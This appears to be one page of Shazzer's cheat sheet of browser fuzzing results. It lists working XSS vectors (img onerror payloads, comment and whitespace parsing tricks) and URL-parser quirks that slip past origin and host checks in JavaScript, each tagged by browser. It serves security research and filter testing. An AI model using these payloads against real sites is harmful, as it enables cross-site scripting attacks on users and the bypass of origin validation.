Shazzer logo

Cheat Sheet

Generated payloads from fuzz test results. Filter by type, category, or browser.

Found 169 vectors with results

<! <a/b="--><img/src/onerror=alert(1)>"
HTMLHTML ParsingChromeFirefoxSafari
</ <a/b="--><img/src/onerror=alert(1)>"
HTMLHTML ParsingChromeFirefoxSafari
<? <a/b="--><img/src/onerror=alert(1)>"
HTMLHTML ParsingChromeFirefoxSafari
if (new URL("https://google.com0x090x09/endpoint").origin=="https://google.com"){alert(9)}
JSURL HandlingChromeFirefox
if (new URL("https://google.com##/endpoint").origin=="https://google.com"){alert(35)}
JSURL HandlingChromeFirefox
if (new URL("https://google.com///endpoint").origin=="https://google.com"){alert(47)}
JSURL HandlingChromeFirefox
if (new URL("https://google.com??/endpoint").origin=="https://google.com"){alert(63)}
JSURL HandlingChromeFirefox
if (new URL("https://google.com\\/endpoint").origin=="https://google.com"){alert(92)}
JSURL HandlingChromeFirefox
<p><img/src/onerror=alert(1)></p>
HTMLHTML ParsingFirefoxChrome
if (new URL("javascript0x09:alert()").protocol=="javascript:"){alert(9)}
JSURL HandlingChromeSafariFirefox
if (new URL("javascript::alert()").protocol=="javascript:"){alert(58)}
JSURL HandlingChromeSafariFirefox
if (new URL("javascript\:alert()").protocol=="javascript:"){alert(92)}
JSURL HandlingChromeSafariFirefox
<iframe src='data:application/xml,<?xml version="1.0" encoding="UTF-8"0x00><x:script xmlns:x="http://www.w3.org/1999/xhtml">window.parent.postMessage("0x00","*")</x:script>'></iframe>0x0D
<script>0x0D
  window.addEventListener('message', e => console.alert(e.data));0x0D
</script>
XSSHTML ParsingChrome
eval('""');alert(34);
JSJavaScript SyntaxFirefoxChromeSafari
<img0x09src=x0x09onerror=alert(9)>
XSSDOM BehaviorChromeFirefox
<img
src=x
onerror=alert(10)>
XSSDOM BehaviorChromeFirefox
<img0x0Csrc=x0x0Conerror=alert(12)>
XSSDOM BehaviorChromeFirefox
<img0x0Dsrc=x0x0Donerror=alert(13)>
XSSDOM BehaviorChromeFirefox
<img src=x onerror=alert(32)>
XSSDOM BehaviorChromeFirefox
<input  id="test" value="s0x00onload="alert(1)" />
XSSHTML ParsingMicrosoft EdgeChrome
if (['https:'].includes("\https:")){0x0D
    alert(92)0x0D
}
JSXSS ExecutionFirefoxChrome
<div><img/src/onerror=alert(1)></div>
HTMLHTML ParsingMicrosoft EdgeFirefoxChrome
<img src=x><img/src/onerror=alert(1)>
HTMLHTML ParsingChromeFirefoxSafari
<img src=0x09x0x09onerror=alert(9)>
XSSDOM BehaviorChromeFirefoxSafari
<img src=
x
onerror=alert(10)>
XSSDOM BehaviorChromeFirefoxSafari
<img src=0x0Cx0x0Conerror=alert(12)>
XSSDOM BehaviorChromeFirefoxSafari
<img src=0x0Dx0x0Donerror=alert(13)>
XSSDOM BehaviorChromeFirefoxSafari
<img src= x onerror=alert(32)>
XSSDOM BehaviorChromeFirefoxSafari
<!----!>><img/src/onerror=alert(1)>
HTMLHTML ParsingChrome
char = String.fromCodePoint(0,0)0x0D
url = "javascript://"+char+"google.com"0x0D
0x0D
try {0x0D
    new URL(url)0x0D
}0x0D
catch(e){0x0D
   pwn(url,char)0x0D
 }0x0D
0x0D
function pwn(url,char){0x0D
   try{0x0D
 window.open(url)0x0D
 console.alert("shirley");0x0D
alert(0,0)0x0D
 }catch(e){0x0D
}0x0D
}
JSURL HandlingChrome
if (new URL("https://0x09localhost/endpoint").host == "localhost") {0x0D
    alert(9);0x0D
}
JSURL HandlingChrome
if (new URL("https:///localhost/endpoint").host == "localhost") {0x0D
    alert(47);0x0D
}
JSURL HandlingChrome
if (new URL("https://@localhost/endpoint").host == "localhost") {0x0D
    alert(64);0x0D
}
JSURL HandlingChrome
if (new URL("https://\localhost/endpoint").host == "localhost") {0x0D
    alert(92);0x0D
}
JSURL HandlingChrome
if (new URL("https://­localhost/endpoint").host == "localhost") {0x0D
    alert(173);0x0D
}
JSURL HandlingChrome
<img src0x09=data:text/plain, id="testImg">
XSSHTML ParsingChrome
<img src
=data:text/plain, id="testImg">
XSSHTML ParsingChrome
<img src0x0C=data:text/plain, id="testImg">
XSSHTML ParsingChrome
<img src0x0D=data:text/plain, id="testImg">
XSSHTML ParsingChrome
<img src =data:text/plain, id="testImg">
XSSHTML ParsingChrome
<div style="color:red">test</div>
HTMLCSS ParsingChromeMicrosoft Edge
document.body.innerHTML = String.fromCodePoint(60) + "img src=x onerror=alert(60)  />";
JSHTML ParsingChrome
$:alert(36)
JSXSS ExecutionChromeSafari
_:alert(95)
JSXSS ExecutionChromeSafari
ª:alert(170)
JSXSS ExecutionChromeSafari
µ:alert(181)
JSXSS ExecutionChromeSafari
0 > 0x7f && normalizationForms.forEach(form => {0x0D
    const normalized = String.fromCodePoint(0).normalize(form);0x0D
    for(let charToCheck of charsToCheck) {0x0D
       if(charToCheck === normalized) {0x0D
            alert(String.fromCodePoint(0)+"("+form+")"+"="+charToCheck);0x0D
        }0x0D
     }0x0D
})
JSJavaScript SyntaxChromeFirefox

Page 4 of 9